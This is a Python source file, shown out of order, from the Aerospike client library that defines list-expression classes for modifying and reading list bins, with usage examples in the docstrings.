            _ExprOp._AS_EXP_CODE_CDT_LIST_MOD,
            0,
            {} if policy is None else {_Keys.LIST_POLICY_KEY: policy},
        )
        self._children = (index, value, mod, target)
        fixed = {}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        if policy is not None:
            fixed[_Keys.LIST_POLICY_KEY] = policy
        self._fixed = fixed
class ListClear(_BaseExpr):
    """Create an expression that removes all items from a list."""
    _op = aerospike.OP_LIST_CLEAR

    def __init__(self, ctx: TypeCTX, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: List expression.
            Example::
                # Clear list value of list nested in list bin "a" index 1.
                from aerospike_helpers import cdt_ctx
                expr = exp.ListClear([cdt_ctx.cdt_ctx_list_index(1)], "a").compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (target,)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListSort(_BaseExpr):
    """Create an expression that sorts a list."""
    _op = aerospike.OP_LIST_SORT

    def __init__(self, ctx: TypeCTX, order: int, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            order (int): Optional flags modifying the behavior of list_sort. This should be constructed by bitwise or'ing together values from :ref:`aerospike_list_sort_flag`.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: list expression.
            Example::
                # Get value of sorted list bin "a".
                expr = exp.ListSort(None, aerospike.LIST_SORT_DEFAULT, "a").compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (target,)
        fixed = {_Keys.LIST_ORDER_KEY: order}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListRemoveByValue(_BaseExpr):
    """Create an expression that removes list items identified by value."""
    _op = aerospike.OP_LIST_REMOVE_BY_VALUE

    def __init__(self, ctx: TypeCTX, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            value (TypeValue): Value or value expression to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: list expression.
            Example::
                # See if list bin "a", with `3` removed, is equal to list bin "b".
                expr = exp.Eq(exp.ListRemoveByValue(None, 3, exp.ListBin("a")), exp.ListBin("b")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByValueList(_BaseExpr):
    """Create an expression that removes list items identified by a list of values."""
    _op = aerospike.OP_LIST_REMOVE_BY_VALUE_LIST

    def __init__(self, ctx: TypeCTX, values: TypeListValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            values (TypeListValue): List of values or list expression.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: list expression.
            Example::
                # Remove elements with values [1, 2, 3] from list bin "a".
                expr = exp.ListRemoveByValueList(None, [1, 2, 3], exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (values, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByValueRange(_BaseExpr):
    """ Create an expression that removes list items identified by value range
        (begin inclusive, end exclusive). If begin is None, the range is less than end.
        If end is None, the range is greater than or equal to begin.
    """
    _op = aerospike.OP_LIST_REMOVE_BY_VALUE_RANGE

    def __init__(self, ctx: TypeCTX, begin: TypeValue, end: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            begin (TypeValue): Begin value or value expression for the range (inclusive).
            end (TypeValue): End value or value expression for the range (exclusive).
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: list expression.
            Example::
                # Remove list of items with values >= 3 and < 7 from list bin "a".
                expr = exp.ListRemoveByValueRange(None, 3, 7, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (begin, end, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByValueRelRankToEnd(_BaseExpr):
    """Create an expression that removes list items nearest to value and greater by relative rank."""
    _op = aerospike.OP_LIST_REMOVE_BY_REL_RANK_RANGE_TO_END

    def __init__(self, ctx: TypeCTX, value: TypeValue, rank: TypeRank, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            value (TypeValue): Start value or value expression.
            rank (TypeRank): Rank integer or integer expression relative to "value".
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: list expression.
            Example::
                # Remove elements larger than 4 by relative rank in list bin "a".
                expr = exp.ListRemoveByValueRelRankToEnd(None, 4, 1, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value, rank, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByValueRelRankRange(_BaseExpr):
    """ Create an expression that removes list items nearest to value and greater by relative rank with a
        count limit.
    """
    _op = aerospike.OP_LIST_REMOVE_BY_REL_RANK_RANGE

    def __init__(self, ctx: TypeCTX, value: TypeValue, rank: TypeRank, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            value (TypeValue): Start value or value expression.
            rank (TypeRank): Rank integer or integer expression relative to "value".
            count (TypeCount): How many elements to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: list expression.
            Example::
                # After removing the 3 elements larger than 4 by relative rank, does list bin "a" include 9?.
                expr = exp.GT(
                    exp.ListGetByValue(None, aerospike.LIST_RETURN_COUNT, 9,
                        exp.ListRemoveByValueRelRankRange(None, 4, 1, 0, exp.ListBin("a"))),
                    0).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value, rank, count, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByIndex(_BaseExpr):
    """Create an expression that removes the list item at the specified index."""
    _op = aerospike.OP_LIST_REMOVE_BY_INDEX

    def __init__(self, ctx: TypeCTX, index: TypeIndex, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            index (TypeIndex): Index integer or integer expression of the element to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: list expression.
            Example::
                # Get size of list bin "a" after index 3 has been removed.
                expr = exp.ListSize(None, exp.ListRemoveByIndex(None, 3, exp.ListBin("a"))).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByIndexRangeToEnd(_BaseExpr):
    """Create an expression that removes list items starting at the specified index through the end of the list."""
    _op = aerospike.OP_LIST_REMOVE_BY_INDEX_RANGE_TO_END

    def __init__(self, ctx: TypeCTX, index: TypeIndex, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            index (TypeIndex): Starting index integer or integer expression of elements to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: list expression.
            Example::
                # Remove all elements starting from index 3 in list bin "a".
                expr = exp.ListRemoveByIndexRangeToEnd(None, 3, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByIndexRange(_BaseExpr):
    """Create an expression that removes "count" list items starting at the specified index."""
    _op = aerospike.OP_LIST_REMOVE_BY_INDEX_RANGE

    def __init__(self, ctx: TypeCTX, index: TypeIndex, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            index (TypeIndex): Starting index integer or integer expression of elements to remove.
            count (TypeCount): Integer or integer expression, how many elements to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: list expression.
            Example::
                # Get size of list bin "a" after index 3, 4, and 5 have been removed.
                expr = exp.ListSize(None, exp.ListRemoveByIndexRange(None, 3, 3, exp.ListBin("a"))).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, count, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByRank(_BaseExpr):
    """Create an expression that removes the list item identified by rank."""
    _op = aerospike.OP_LIST_REMOVE_BY_RANK

    def __init__(self, ctx: TypeCTX, rank: TypeRank, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            rank (TypeRank): Rank integer or integer expression of the element to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: list expression.
            Example::
                # Remove smallest value in list bin "a".
                expr = exp.ListRemoveByRank(None, 0, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByRankRangeToEnd(_BaseExpr):
    """Create an expression that removes list items starting at the specified rank through the last ranked item."""
    _op = aerospike.OP_LIST_REMOVE_BY_RANK_RANGE_TO_END

    def __init__(self, ctx: TypeCTX, rank: TypeRank, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            rank (TypeRank): Rank integer or integer expression of the element to start removing at.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: list expression.
            Example::
                # Remove the 2 largest elements from List bin "a".
                expr = exp.ListRemoveByRankRangeToEnd(None, -2, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByRankRange(_BaseExpr):
    """Create an expression that removes "count" list items starting at the specified rank."""
    _op = aerospike.OP_LIST_REMOVE_BY_RANK_RANGE

    def __init__(self, ctx: TypeCTX, rank: TypeRank, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            rank (TypeRank): Rank integer or integer expression of the element to start removing at.
            count (TypeCount): Count integer or integer expression of elements to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: list expression.
            Example::
                # Remove the 3 smallest items from list bin "a".
                expr = exp.ListRemoveByRankRange(None, 0, 3, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, count, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
#######################
# List Read Expressions
#######################
class ListSize(_BaseExpr):
    """Create an expression that returns the size of a list."""
    _op = aerospike.OP_LIST_SIZE

    def __init__(self, ctx: TypeCTX, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: Integer expression.
            Example::
                #Take the size of list bin "a".
                expr = exp.ListSize(None, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (target,)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListGetByValue(_BaseExpr):
    """ Create an expression that selects list items identified by value and returns selected
        data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_VALUE

    def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value (TypeValue): Value or value expression of the element to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: Expression.
            Example::
                # Get the index of the element with value, 3, in list bin "a".
                expr = exp.ListGetByValue(None, aerospike.LIST_RETURN_INDEX, 3, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value, target)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByValueRange(_BaseExpr):
    """ Create an expression that selects list items identified by value range and returns selected
        data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_VALUE_RANGE

    def __init__(
        self,
        ctx: TypeCTX,
        return_type: int,
        value_begin: TypeValue,
        value_end: TypeValue,
        bin: TypeBinName
    ):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value_begin (TypeValue): Value or value expression of the first element to get.
            value_end (TypeValue): Value or value expression of the ending element.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: Expression.
            Example::
                # Get rank of values between 3 (inclusive) and 7 (exclusive) in list bin "a".
                expr = exp.ListGetByValueRange(None, aerospike.LIST_RETURN_RANK, 3, 7, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value_begin, value_end, target)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByValueList(_BaseExpr):
    """ Create an expression that selects list items identified by values and returns selected
        data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_VALUE_LIST

    def __init__(self, ctx: TypeCTX, return_type: int, value: TypeListValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value (TypeListValue): List or list expression of the values of elements to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: Expression.
            Example::
                #Get the indexes of the the elements in list bin "a" with values [3, 6, 12].
                expr = exp.ListGetByValueList(None, aerospike.LIST_RETURN_INDEX, [3, 6, 12], exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value, target)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByValueRelRankRangeToEnd(_BaseExpr):
    """Create an expression that selects list items nearest to value and greater by relative rank"""
    _op = aerospike.OP_LIST_GET_BY_VALUE_RANK_RANGE_REL_TO_END

    def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, rank: TypeRank, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value (TypeValue): Value or value expression to get items relative to.
            rank (TypeRank): Rank integer expression. Rank relative to "value" to start getting elements.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: Expression.
            Example::
                # Get the values of all elements in list bin "a" larger than 3.
                expr = exp.ListGetByValueRelRankRangeToEnd(None, aerospike.LIST_RETURN_VALUE, 3, 1, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value, rank, target)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByValueRelRankRange(_BaseExpr):
    """ Create an expression that selects list items nearest to value and greater by relative rank with a
        count limit and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_VALUE_RANK_RANGE_REL

    def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, rank: TypeRank, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value (TypeValue): Value or value expression to get items relative to.
            rank (TypeRank): Rank integer expression. Rank relative to "value" to start getting elements.
            count (TypeCount): Integer value or integer value expression, how many elements to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: Expression.
            Example::
                # Get the next 2 values in list bin "a" larger than 3.
                expr = exp.ListGetByValueRelRankRange(None, aerospike.LIST_RETURN_VALUE, 3, 1, 2, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value, rank, count, target)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByIndex(_BaseExpr):
    """ Create an expression that selects the list item identified by index
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_INDEX

    def __init__(
        self,
        ctx: TypeCTX,
        return_type: int,
        value_type: int,
        index: TypeIndex,
        bin: TypeBinName,
    ):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value_type (int): The value type that will be returned by this expression (ResultType).
            index (TypeIndex): Integer or integer expression of the index to get the element at.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: Expression.
            Example::
                # Get the value at index 0 in list bin "a". (assume this value is an integer)
                expr = exp.ListGetByIndex(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 0, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, target)
        fixed = {_Keys.VALUE_TYPE_KEY: value_type, _Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByIndexRangeToEnd(_BaseExpr):
    """ Create an expression that selects list items starting at the specified index through the end of the list
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_INDEX_RANGE_TO_END

    def __init__(self, ctx: TypeCTX, return_type: int, index: TypeIndex, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            index (TypeIndex): Integer or integer expression of the index to start getting elements at.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: Expression.
            Example::
                # Get element 5 to end from list bin "a".
                expr = exp.ListGetByIndexRangeToEnd(None, aerospike.LIST_RETURN_VALUE, 5, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, target)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByIndexRange(_BaseExpr):
    """ Create an expression that selects "count" list items starting at the specified index
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_INDEX_RANGE

    def __init__(self, ctx: TypeCTX, return_type: int, index: TypeIndex, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            index (TypeIndex): Integer or integer expression of the index to start getting elements at.
            count (TypeCount): Integer or integer expression for the count of elements to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: Expression.
            Example::
                # Get elements at indexes 3, 4, 5, 6 in list bin "a".
                expr = exp.ListGetByIndexRange(None, aerospike.LIST_RETURN_VALUE, 3, 4, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, count, target)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByRank(_BaseExpr):
    """ Create an expression that selects the list item identified by rank
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_RANK

    def __init__(
        self,
        ctx: TypeCTX,
        return_type: int,
        value_type: int,
        rank: TypeRank,
        bin: TypeBinName,
    ):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value_type (int): The value type that will be returned by this expression (ResultType).
            rank (TypeRank): Rank integer or integer expression of the element to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
            :return: Expression.
            Example::
                # Get the smallest element in list bin "a".
                expr = exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 0, exp.ListBin("a")).compile()
        """
        # A bare bin name is promoted to a ListBin expression.
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, target)
        fixed = {_Keys.VALUE_TYPE_KEY: value_type, _Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByRankRangeToEnd(_BaseExpr):
    """ Create an expression that selects list items starting at specified rank to the last ranked item
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_RANK_RANGE_TO_END

    def __init__(self, ctx: TypeCTX, return_type: int, rank: TypeRank, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            rank (TypeRank): Rank integer or integer expression of first element to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the three largest elements in list bin "a".
            expr = exp.ListGetByRankRangeToEnd(None, aerospike.LIST_RETURN_VALUE, -3, exp.ListBin("a")).compile()
        """
        # Coerce a bare bin name into a ListBin expression child.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, bin_expr)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByRankRange(_BaseExpr):
    """ Create an expression that selects "count" list items starting at specified rank
        and returns selected data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_RANK_RANGE

    def __init__(self, ctx: TypeCTX, return_type: int, rank: TypeRank, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            rank (TypeRank): Rank integer or integer expression of first element to get.
            count (TypeCount): Count integer or integer expression for how many elements to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the 3 smallest elements in list bin "a".
            expr = exp.ListGetByRankRange(None, aerospike.LIST_RETURN_VALUE, 0, 3, exp.ListBin("a")).compile()
        """
        # Promote a raw bin name to a ListBin expression before storing children.
        if not isinstance(bin, _BaseExpr):
            bin = ListBin(bin)
        self._children = (rank, count, bin)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
| 44.009597 | 180 | 0.62748 | ##########################################################################
# Copyright 2013-2021 Aerospike, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
List expressions contain expressions for reading and modifying Lists. Most of
these operations are from the standard :mod:`List API <aerospike_helpers.operations.list_operations>`.
Example::
import aerospike_helpers.expressions as exp
#Take the size of list bin "a".
expr = exp.ListSize(None, exp.ListBin("a")).compile()
'''
from __future__ import annotations
from itertools import chain
from typing import List, Optional, Tuple, Union, Dict, Any
import aerospike
from aerospike_helpers import cdt_ctx
from aerospike_helpers.expressions.resources import _GenericExpr
from aerospike_helpers.expressions.resources import _BaseExpr
from aerospike_helpers.expressions.resources import _ExprOp
from aerospike_helpers.expressions.resources import ResultType
from aerospike_helpers.expressions.resources import _Keys
from aerospike_helpers.expressions.base import ListBin
######################
# List Mod Expressions
######################
TypeBinName = Union[_BaseExpr, str]
TypeListValue = Union[_BaseExpr, List[Any]]
TypeIndex = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeCTX = Union[None, List[cdt_ctx._cdt_ctx]]
TypeRank = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeCount = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeValue = Union[_BaseExpr, Any]
TypePolicy = Union[Dict[str, Any], None]
class ListAppend(_BaseExpr):
"""Create an expression that appends value to end of list."""
_op = aerospike.OP_LIST_APPEND
def __init__(self, ctx: TypeCTX, policy: TypePolicy, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
value (TypeValue): Value or value expression to append to list.
